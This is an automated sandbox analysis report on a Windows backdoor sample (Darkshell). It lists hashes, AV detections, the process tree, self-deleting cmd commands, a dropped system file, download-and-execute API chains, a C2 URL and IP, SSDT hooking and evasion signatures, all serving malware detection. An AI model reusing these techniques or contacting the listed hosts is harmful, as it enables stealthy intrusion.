Windows Analysis Report
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe

Overview

General Information

Sample name: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Analysis ID: 1657698
MD5: 4194ba809c07479d0b6c3681d218661b
SHA1: 2e8c858633dd5d519d8a7231150ddbc24fef2675
SHA256: 666e5e939aca03a8c323fc257063430fbab202f6ae1c4bf8c04fe62c75dade4b
Tags: exe, user-SecuriteInfoCom

Detection

Score: 88
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
May modify the system service descriptor table (often done to hook functions)
PE file has a writeable .text section
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Use NTFS Short Name in Command Line
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe (PID: 3244 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe" MD5: 4194BA809C07479D0B6C3681D218661B)
    • WinH83.exe (PID: 3596 cmdline: "C:\Windows\system32\WinH83.exe" MD5: C7B758D198A32EF2BA4112EF346C74BA)
      • cmd.exe (PID: 6696 cmdline: C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 1752 cmdline: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, CommandLine: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, ParentProcessId: 3244, ParentProcessName: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, ProcessId: 1752, ProcessName: cmd.exe
No Suricata rule has matched

AV Detection

Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Avira: detected
Source: C:\Windows\SysWOW64\WinH83.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Virustotal: Detection: 70%
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | ReversingLabs: Detection: 78%
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb@ source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 4x nop then mov eax, dword ptr fs:[00000030h] | 0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 4x nop then mov dword ptr [00406949h], 00000000h | 0_2_0040653C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 4x nop then mov eax, dword ptr fs:[00000030h] | 0_2_0040D06A
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 4x nop then add byte ptr [eax], al | 0_2_004071E2
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 4x nop then mov dword ptr [00406949h], 00000000h | 1_2_00406549
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 4x nop then mov eax, dword ptr fs:[00000030h] | 1_2_0040D07E
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 4x nop then mov eax, dword ptr fs:[00000030h] | 1_2_0040D06A
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 4x nop then add byte ptr [eax], al | 1_2_004071E2
Source: Joe Sandbox View | IP Address: 5.79.71.225
Source: global traffic | TCP traffic: 192.168.2.5:49717 -> 5.79.71.225:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040653C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,Sleep,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep | 0_2_0040653C
Source: global traffic | DNS traffic detected: DNS query: www.003zzy.com
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.003zzy.com/ad1in.htm
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.003zzy.com/ad1in.htmC
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.003zzy.com/ad1in.htmC:
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.003zzy.com/ad1in.htmhv
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.003zzy.com/ad1in.htms?
Source: WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.google.com

System Summary

Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WinH83.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401680: DeviceIoControl,GetLastError | 0_2_00401680
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004022C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle | 0_2_004022C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004023A0 lstrlen,strstr,strstr,_strlwr,_strlwr,lstrcpy,lstrcpy,strstr,Sleep,Sleep,_strlwr,lstrcpy,strstr,strstr,strstr,strcspn,strcspn,strncpy,strncpy,strcspn,strstr,strcspn,strncpy,atoi,socket,htons,connect,send,CreateThread,select,__WSAFDIsSet,recv,InterlockedExchange,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,recv,CreateThread,send,shutdown,closesocket,ExitWindowsEx,ExitWindowsEx,InterlockedExchange,OpenMutexA,ReleaseMutex,CloseHandle,GetSystemDirectoryA,lstrcat,lstrcat,lstrcat,DeleteFileA,wsprintfA,SHDeleteKeyA,closesocket,ExitProcess,InterlockedExchange,shutdown,closesocket | 0_2_004023A0
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_004023A0 lstrlen,strstr,strstr,_strlwr,_strlwr,lstrcpy,lstrcpy,strstr,Sleep,Sleep,_strlwr,lstrcpy,strstr,strstr,strstr,strcspn,strcspn,strncpy,strncpy,strcspn,strstr,strcspn,strncpy,atoi,socket,htons,connect,send,CreateThread,select,__WSAFDIsSet,recv,InterlockedExchange,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,recv,CreateThread,send,shutdown,closesocket,ExitWindowsEx,ExitWindowsEx,InterlockedExchange,OpenMutexA,ReleaseMutex,CloseHandle,GetSystemDirectoryA,lstrcat,lstrcat,lstrcat,DeleteFileA,wsprintfA,SHDeleteKeyA,closesocket,ExitProcess,InterlockedExchange,shutdown,closesocket | 1_2_004023A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | File created: C:\Windows\SysWOW64\WinH83.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | File created: C:\Windows\SysWOW64\WinH83.exe:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004023A0 | 0_2_004023A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004078A8 | 0_2_004078A8
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_004023A0 | 1_2_004023A0
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_004078A8 | 1_2_004078A8
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZhuDongFangYu.exe0 vs SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Binary or memory string: OriginalFilenameZhuDongFangYu.exe0 vs SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal88.evad.winEXE@8/4@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle | 0_2_00401390
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle | 1_2_00401390
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA | 0_2_00402170
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA | 1_2_00402170
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi | 0_2_00401D00
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi | 1_2_00401D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Virustotal: Detection: 70%
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WinH83.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static file information: File size 25208853 > 1048576
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb@ source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040D07E LoadLibraryA,GetProcAddress,EntryPoint,DeleteFileA | 0_2_0040D07E
Source: initial sample | Static PE information: section where entry point is pointing to: 300
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: section name: .mackt
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: section name: .vmp0
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: section name: 300
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: section name: .Katja
Source: WinH83.exe.0.dr | Static PE information: section name: .mackt
Source: WinH83.exe.0.dr | Static PE information: section name: .vmp0
Source: WinH83.exe.0.dr | Static PE information: section name: 300
Source: WinH83.exe.0.dr | Static PE information: section name: .Katja
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B249 push ebp; mov dword ptr [esp], 017435ECh | 0_2_0040B254
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B000 pushfd ; mov dword ptr [esp], 00000000h | 0_2_0040B006
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B213 push dword ptr [esp+50h]; retn 0054h | 0_2_0040B232
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B235 push ebp; mov dword ptr [esp], 017435ECh | 0_2_0040B254
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004056D0 push eax; ret | 0_2_004056FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401BED push 00402310h; ret | 0_2_00401C06
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B281 push dword ptr [esp+04h]; retn 0008h | 0_2_0040B28F
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040788D push ecx; ret | 0_2_004078A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040B292 pushfd ; mov dword ptr [esp], 004067FDh | 0_2_0040B298
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040B249 push ebp; mov dword ptr [esp], 017435ECh | 1_2_0040B254
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040B000 pushfd ; mov dword ptr [esp], 00000000h | 1_2_0040B006
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040B213 push dword ptr [esp+50h]; retn 0054h | 1_2_0040B232
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040B235 push ebp; mov dword ptr [esp], 017435ECh | 1_2_0040B254
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_004056D0 push eax; ret | 1_2_004056FE
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401BED push 00402310h; ret | 1_2_00401C06
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040B281 push dword ptr [esp+04h]; retn 0008h | 1_2_0040B28F
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040788D push ecx; ret | 1_2_004078A0
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00406819 pushfd ; mov dword ptr [esp], 004067FDh | 1_2_0040B298
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Static PE information: section name: .text entropy: 7.183221181125893
Source: WinH83.exe.0.dr | Static PE information: section name: .text entropy: 7.183221181125893

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Executable created and started: C:\Windows\SysWOW64\WinH83.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040653C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,Sleep,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep | 0_2_0040653C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | File created: C:\Windows\SysWOW64\WinH83.exe (dropped file)
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi | 0_2_00401D00

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Binary or memory string: KeServiceDescriptorTable
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: KeServiceDescriptorTable
Source: WinH83.exe | Binary or memory string: KeServiceDescriptorTable
Source: WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WinH83.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WinH83.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-1480
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1522
Source: C:\Windows\SysWOW64\WinH83.exeStalling execution: Execution stalls by calling Sleepgraph_1-1249
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-1645
